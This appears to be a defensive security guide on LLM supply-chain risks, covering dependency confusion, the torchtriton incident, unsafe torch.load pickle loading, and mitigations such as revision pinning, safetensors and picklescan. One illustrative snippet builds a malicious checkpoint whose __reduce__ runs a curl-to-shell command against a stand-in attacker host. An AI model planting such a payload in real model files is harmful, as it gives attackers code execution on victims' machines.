LLM03: Supply Chain Vulnerabilities — Securing the LLM Software Supply Chain
In December 2022, PyTorch’s nightly build pipeline was compromised in a textbook dependency confusion attack. The package torchtriton — a legitimate PyTorch dependency — was shadowed by a malicious package of the same name on the public PyPI index. Anyone running pip install torchtriton fetched the attacker’s version, which exfiltrated /etc/passwd, SSH keys, and environment variables to a remote server. The malicious package was live for roughly five days (December 25–30) before PyTorch published a security advisory and removed the dependency. This wasn’t an attack on PyTorch’s model weights or training data — it was a supply chain attack on the Python packaging layer. In the LLM ecosystem, this attack surface is substantially wider: it includes model weights, fine-tuning datasets, embeddings, Hugging Face Hub repositories, quantized model files, and third-party agent plugins, each of which can be a vector for compromise.
What is LLM supply chain vulnerability?
OWASP LLM03 describes the risk that attacker-controlled artifacts enter the LLM application stack through the supply chain rather than through runtime inputs. The threat model covers four distinct layers:
Dependency layer. Python packages, JavaScript libraries, Docker base images, and Rust crates that your LLM application depends on. Dependency confusion, typosquatting, and compromised maintainer accounts all apply here. This is the most mature attack surface — the PyTorch torchtriton incident, the ctx and discordpy-self PyPI compromises, and the event-stream npm incident all fall into this category.
Model artifact layer. Pretrained model weights downloaded from Hugging Face Hub, model registries, or direct URLs. A model file can contain pickled Python objects that execute arbitrary code on deserialization. Hugging Face researchers documented multiple malicious model uploads that used pickle serialization to embed os.system() calls inside .pt and .bin files. Downloading and loading such a file with torch.load() is equivalent to running an unsigned binary.
Dataset and fine-tuning layer. Training datasets hosted on Hugging Face Hub, S3 buckets, or third-party providers. A poisoned dataset can embed behavioral backdoors that activate on specific trigger phrases — see LLM04 for the model poisoning angle. From a supply chain perspective, the risk is provenance: if you cannot verify the integrity of the dataset you fine-tuned on, you cannot make behavioral guarantees about the resulting model.
Plugin and tool layer. Third-party LangChain tools, LlamaIndex integrations, AutoGPT plugins, and OpenAI Actions schema definitions. A plugin that your agent loads at runtime has the same privilege level as a Python import — if it is compromised or malicious, it can execute arbitrary code in your application’s process.
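The dataset and plugin layers reduce to the same provenance question: does the artifact on disk match a hash you recorded from a known-good copy? Below is a minimal sketch of that check, assuming you maintain such a manifest yourself (the manifest layout and file names are hypothetical, not part of any standard tool):

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large datasets don't load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_manifest(root: Path, manifest: dict[str, str]) -> list[str]:
    """Return the relative paths whose on-disk hash does not match the manifest."""
    mismatches = []
    for rel_path, expected in manifest.items():
        if sha256_of(root / rel_path) != expected:
            mismatches.append(rel_path)
    return mismatches
```

Run it as a gate before fine-tuning or plugin load: an empty return means every artifact matches its recorded hash; anything else should fail the pipeline.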
The exploit: malicious model artifact
Consider a data science team that pulls a popular quantized model from Hugging Face Hub without pinning a specific revision:
```python
# VULNERABLE: unpinned model download, unsafe deserialization
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# VULNERABLE: no revision pin — latest commit could be compromised
model = AutoModelForCausalLM.from_pretrained("some-org/some-model")
tokenizer = AutoTokenizer.from_pretrained("some-org/some-model")

# VULNERABLE: torch.load without weights_only=True — arbitrary code execution
checkpoint = torch.load("./checkpoints/finetuned.pt")  # VULNERABLE: pickle RCE
model.load_state_dict(checkpoint)
```

An attacker who gains write access to some-org/some-model on Hugging Face Hub — through a compromised token, social engineering, or a malicious pull request — can push a new model revision. Because the code does not pin a revision, the next container build or from_pretrained() call fetches the attacker’s version.
The torch.load() call is independently dangerous: any .pt file that reached the filesystem through an untrusted channel can contain a __reduce__-based pickle payload:
```python
# Attacker-crafted malicious checkpoint (illustrative — do not run)
import os
import torch

class MaliciousPayload:
    def __reduce__(self):
        # This executes when unpickled by torch.load()
        return (os.system, ("curl https://attacker.example/shell | sh",))

torch.save(MaliciousPayload(), "malicious_checkpoint.pt")
# torch.load("malicious_checkpoint.pt") → executes the shell command
```

The exploit: dependency confusion
```
# VULNERABLE: no hash pinning, no private index enforcement
# torchvision==0.15.0   ← legitimate package
# llm-utils==1.2.0      ← internal package name, also published to public PyPI by attacker

# pip install -r requirements.txt
# If your private package "llm-utils" is also available on PyPI at a higher version,
# pip may resolve to the public (malicious) package.
```

The dependency confusion attack works because pip gives no priority to one index over another: when --extra-index-url is configured, pip pools candidates from every index and installs the highest version it finds. For internal packages whose names an attacker has also registered on public PyPI at a higher version number, pip silently installs the attacker’s version.
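pip’s real resolver is far more involved, but the version-pooling behavior can be shown with a toy resolver (the resolve helper and the index layout below are illustrative, not pip internals):

```python
def resolve(package: str, indexes: dict[str, dict[str, str]]) -> tuple[str, str]:
    """Return (version, index_name) of the highest version found across all indexes.

    Models the key property behind dependency confusion: no index is preferred,
    so the highest version wins regardless of where it lives.
    """
    candidates = []
    for index_name, packages in indexes.items():
        if package in packages:
            version = packages[package]
            key = tuple(int(part) for part in version.split("."))
            candidates.append((key, version, index_name))
    if not candidates:
        raise LookupError(f"{package} not found on any index")
    _, version, index_name = max(candidates)
    return version, index_name

indexes = {
    "private": {"llm-utils": "1.2.0"},       # your internal package
    "public-pypi": {"llm-utils": "99.0.0"},  # attacker's shadow package
}
print(resolve("llm-utils", indexes))  # → ('99.0.0', 'public-pypi')
```

The attacker only needs a version number higher than your internal one; the private index is never consulted preferentially.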
Mitigations
M1: Pin model revisions and verify checksums
Always pin Hugging Face model downloads to a specific commit SHA, and verify the file hash of any downloaded artifact:
```python
import hashlib
from transformers import AutoModelForCausalLM, AutoTokenizer

# SAFE: pinned to a specific commit SHA — immune to repo overwrites
PINNED_REVISION = "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2"
EXPECTED_SHA256 = "deadbeef..."  # compute from a known-good download

model = AutoModelForCausalLM.from_pretrained(
    "meta-llama/Llama-3.1-8B",
    revision=PINNED_REVISION,  # SAFE: immutable git commit hash
)
tokenizer = AutoTokenizer.from_pretrained(
    "meta-llama/Llama-3.1-8B",
    revision=PINNED_REVISION,
)

# SAFE: verify downloaded artifact hash before loading
def verified_load(path: str, expected_sha256: str) -> bytes:
    with open(path, "rb") as f:
        data = f.read()
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"Checksum mismatch: expected {expected_sha256}, got {actual}")
    return data
```

M2: Use safetensors instead of pickle-based formats
The safetensors format stores tensor data only — it cannot embed executable Python code. Prefer it for any model weights you load at runtime:
```python
import torch
from safetensors.torch import load_file
from transformers import AutoModelForCausalLM

# VULNERABLE: pickle-based loading
checkpoint = torch.load("model.pt")  # VULNERABLE: RCE risk

# SAFE: safetensors — no code execution possible
tensors = load_file("model.safetensors")  # SAFE: pure tensor data

# For transformers, prefer safetensors-backed models
model = AutoModelForCausalLM.from_pretrained(
    "mistralai/Mistral-7B-v0.1",
    use_safetensors=True,  # SAFE: loads .safetensors files only
)
```

M3: Audit Python dependencies with pip-audit and lock files
Maintain a locked requirements.txt with hash verification, and run pip-audit in CI to catch packages with known CVEs:
```shell
# Generate a locked requirements file with hashes
pip-compile requirements.in --generate-hashes -o requirements.txt

# Audit for known vulnerabilities
pip-audit -r requirements.txt

# Enforce hash checking at install time (CI/CD)
pip install --require-hashes -r requirements.txt

# pip.conf: route all installs through a private index.
# NOTE: pip gives index-url NO precedence over extra-index-url, so listing
# public PyPI as extra-index-url leaves the confusion window open. Point
# index-url at a private proxy that mirrors PyPI instead.
# [global]
# index-url = https://pypi.company.internal/simple/
# no-index = false  # set true to block all remote indexes for air-gapped builds
```

M4: Scan model files before loading
Use picklescan to detect malicious pickle payloads in model files before loading them:
```shell
# Install and run PickleScan on a directory of downloaded models
pip install picklescan
picklescan -p ./models/

# Output for a clean model:
#   No dangerous pickle imports found in 3 files
# Output for a malicious model:
#   Malicious pickle imports found in models/finetuned.pt:
#   Global import: posix / system
```

```python
import subprocess

def safe_load_checkpoint(path: str) -> dict:
    # SAFE: scan before loading
    result = subprocess.run(
        ["picklescan", "-p", path, "--exit-code"],
        capture_output=True,
    )
    if result.returncode != 0:
        raise RuntimeError(f"PickleScan detected malicious content in {path}")
    import torch
    return torch.load(path, weights_only=True)  # SAFE: scan + weights_only
```

Detecting LLM03 with LLMArmor
LLM03 involves compromised artifacts in the supply chain — model files, Python packages, datasets. This requires provenance tracking and runtime scanning rather than static analysis of Python source code. LLMArmor’s AST-based scanner does not currently cover supply chain risks.
For comprehensive supply chain coverage, use complementary tools:
- pip-audit — scans installed packages against OSV and PyPI advisory databases
- safety — similar to pip-audit, with additional commercial feeds
- PickleScan — detects malicious pickle imports in model files
- Hugging Face model signing — Sigstore-based signatures for model artifacts
- Garak — runtime behavioral probing to detect backdoored models
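In CI, the scanners above can be chained into a single gate. The sketch below assumes the tools are installed and uses placeholder paths for your project layout:

```shell
#!/usr/bin/env bash
# Illustrative CI gate; each command exits nonzero on a finding, failing the build.
set -euo pipefail

# Dependency layer: fail on packages with known CVEs
pip-audit -r requirements.txt

# Model artifact layer: refuse to ship weights containing pickle payloads
picklescan -p ./models/

# Application layer: static checks for the LLM risks LLMArmor does cover
llmarmor scan ./src
```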
```shell
pip install llmarmor
llmarmor scan ./src
```

LLMArmor will still catch LLM01, LLM05, LLM06, LLM07, LLM08, and LLM10 patterns in your application code. For supply chain hygiene, combine it with the tools above.
Frequently asked questions
- How does the PyTorch torchtriton supply chain attack work?
- In December 2022, an attacker published a malicious package named `torchtriton` to the public PyPI index. PyTorch uses `torchtriton` as an internal dependency name for its triton GPU kernels. Because pip pools candidates from every configured index rather than preferring a private one, any machine running `pip install torchtriton` (or building a Docker image from PyTorch nightlies) fetched the attacker's version, which exfiltrated host information. The fix: pin dependencies to specific versions and hashes, and use `--index-url` to point installs at a single trusted index.
- Why is torch.load() a security risk?
- PyTorch's `torch.load()` uses Python's pickle protocol by default. Pickle is fundamentally unsafe for untrusted input because the `__reduce__` method on any pickled class can specify an arbitrary Python callable to invoke during deserialization. An attacker who crafts a malicious `.pt` checkpoint file can execute arbitrary shell commands simply by having their file loaded. Mitigation: use `torch.load(path, weights_only=True)` or the `safetensors` format, which stores only raw tensor data with no code execution path.
- What is the safetensors format and why is it safer than .pt files?
- Safetensors is a model serialization format developed by Hugging Face that stores only tensor data in a simple binary layout. Unlike pickle-based formats (`.pt`, `.bin`), safetensors has no mechanism to embed executable Python objects — loading a safetensors file cannot trigger arbitrary code execution. Most popular models on Hugging Face Hub now offer safetensors variants. Use `use_safetensors=True` in `AutoModel.from_pretrained()` or `from safetensors.torch import load_file` directly.
- How do I pin Hugging Face model versions in production?
- Pass `revision='<commit-sha>'` to `from_pretrained()`. Every commit on Hugging Face Hub has an immutable SHA that cannot be overwritten, unlike branch names or tags. Find the commit SHA in the Hub's git history tab. For additional integrity, compute the SHA-256 hash of the downloaded model files and verify it on each deployment. Hugging Face also supports model signing with Sigstore for cryptographic provenance.
- What is a dependency confusion attack and how does it affect LLM projects?
- Dependency confusion (also called namespace confusion) occurs when a package manager resolves a private internal package name by fetching a public package of the same name at a higher version number. For LLM projects that use internal Python packages (data processing utilities, custom tokenizers, internal API clients), if those package names are also registered on public PyPI by an attacker at a higher version, `pip install` may silently install the attacker's version. Mitigation: use hash-locked requirement files (`pip-compile --generate-hashes`), point `--index-url` at a private proxy that mirrors PyPI, or use `--no-index` for air-gapped production builds.
- Should I audit Hugging Face Hub models before using them in production?
- Yes. Run `picklescan` against any downloaded model files before loading them. Prefer safetensors-format models. Check the model card and repository provenance: is the organization verified? Does the model card explain the training data and methodology? For fine-tuned or community-uploaded models, the bar should be higher — treat them the same as a third-party Python package: review before use, pin the revision, and monitor for updates.
- Is LLM03 covered by LLMArmor?
- No. LLM03 supply chain risks involve artifact provenance, package integrity, and runtime behavioral analysis — none of which are detectable by inspecting Python source code. LLMArmor focuses on structural code patterns (LLM01, LLM05, LLM06, LLM07, LLM08, LLM10). For supply chain coverage, use `pip-audit` for dependency vulnerability scanning, `picklescan` for model file integrity, and Garak for behavioral backdoor probing.